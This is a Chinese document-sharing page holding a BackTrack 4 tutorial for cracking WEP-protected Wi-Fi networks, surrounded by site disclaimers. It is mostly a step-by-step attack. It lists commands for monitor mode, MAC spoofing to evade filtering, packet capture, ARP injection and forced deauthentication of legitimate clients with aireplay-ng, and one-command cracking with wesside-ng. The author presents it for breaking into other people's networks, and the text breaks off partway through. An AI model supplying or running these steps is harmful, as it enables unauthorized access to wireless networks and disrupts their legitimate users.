BT4使用教程.doc

  1. 1、本文档共14页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
BT4使用教程

下载的BT4 解压,得到BOOT 和BT4 两个文件,放d 盘根目录下。将spoowep2.lzm 放到D:\BT4\modules 下,重启电脑,到dos 下。 输入: d: 回车 cd boot 回车 cd dos 回车 cd bt4 回车 输入: root 回车 toor 回车(注意屏幕上不显示字母,只管输) startx 回车 (不要输入xconf,不然进不了bt4,这里跟bt3 不同) 打开用命令生成器生成的TXT 文件,打开一个窗口 复制、粘贴、执行 ifconfig –a Wlan0 就是瑞银 执行: airmon-ng start wlan0 6 瑞银端口变为mon0 执行: ln -fs bash /bin/sh 执行: ls -al /bin/sh 有bash 成功 执行:spoonwep 第一个,网卡选mon0。 第二个选 normal 第三个选 unknown victim 点next 点launch,在右下角会出来spoonwep vict.scan,点击 回到上一个界面 有 √的为有客户端,破解起来比较容易 选择要破解的ESSID 后 ,点selection ok 第一个框选 fragmentation & forge attack 其他默认, 再选launchData 在涨,到1w5 左右,密码自动会跳出来。这个我以前用760n 破解过,就不继续 下去啦。 BT4无线上网破解教程 1.启动BT4,选1024x768图形模式,用户名root,密码toor(如果需要),执行startx进入桌面。 注释说明:[] 可选回显/ 或者() 提示 ---------------------WEP--------------------- ------------------命令行窗口 1:---------------------- 1.ifconfig -a wlan0 ... xx:xx:xx:xx:xx:xx [macchanger -m 00:11:22:33:44:55 wlan0 修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入 ] 2.ifconfig -a wlan0 up 3.airmon-ng start wlan0 6 monitor mode enabled on mon0 (6是频道) 另一说5100要支持注入用airmon-ng start wlan0 如果这里回显(monitor mode enabled) 则下面命令所有端口号要用wlan0 [ aireplay-ng -9 mon0 / aireplay-ng --test mon0 Injection is working/No anwser(注入攻击成功/不成功) (检测你的网卡是否支持注入) ] 4.airodump-ng -w pack -c 6 mon0/wlan0 (pack是随便起的获取的ivs的保存文件的名字) 另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0 ------------------命令行窗口2:--------------------- 一、有客户端: 破解:abcd四种方式 a.合法客户端产生大量有效的数据,能直接获得大量cap。 收到10000以上data后,直接转命令行窗口3,破解密码 b.合法客户端只能产生少量数据,就需要注入-3攻击加速产生大量数据。 5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行) Read 11542 packets got 12587 ARP ...,send 71524 packets ... 很多类似行 c.合法客户端不在通信,注入模式不成功, 用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接, 新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入 5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0 6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0 (可能要另开窗) d.有客户端,并且客户端能产生有效arp 数据的另类破解方式 输入modprobe –r iwl3945 (加载网卡) 输入modprobe ipwraw 输入airmon-ng start wlan0 6 现在,只要一个命令就搞定,输入: 输入wesside-ng -i wlan0 -v 01

文档评论(0)

xcs88858 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8130065136000003

1亿VIP精品文档

相关文档